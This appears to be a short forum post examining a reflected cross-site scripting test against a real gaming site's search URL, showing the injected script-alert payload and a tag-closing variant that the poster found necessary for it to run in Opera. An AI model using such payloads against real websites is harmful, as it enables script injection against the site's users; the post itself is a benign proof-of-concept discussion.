http://www.allakhazam.com/fsearch.html?subject=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22&content=&poster=&date1_m=1&date1_d=1&date1_y=1999&date2_m=1&date2_d=1&date2_y=2007&cats=all&dosearch=1
This was posted on the first page, I noticed something rather interesting.
In opera, this specific string doesn't produce an alert.
It comes out like this.
<input type="text" name="subject" value=""<SCRIPT>alert("XSS")</SCRIPT>"" size="30" maxlength="100" />
But, I have to close the previous tag before the script will run.
<input type="text" name="subject" value=""/><SCRIPT>alert("XSS")</SCRIPT><"" size="30" maxlength="100" />
(the last < was just to prevent the html from showing. )
It shows </script> in red, meaning it's only one tag, without a partner. The first <script> is in blue, showing it's PART of a tag, not a single tag itself.
Not really sure if it regards to anything...it's just odd.
-
Kyran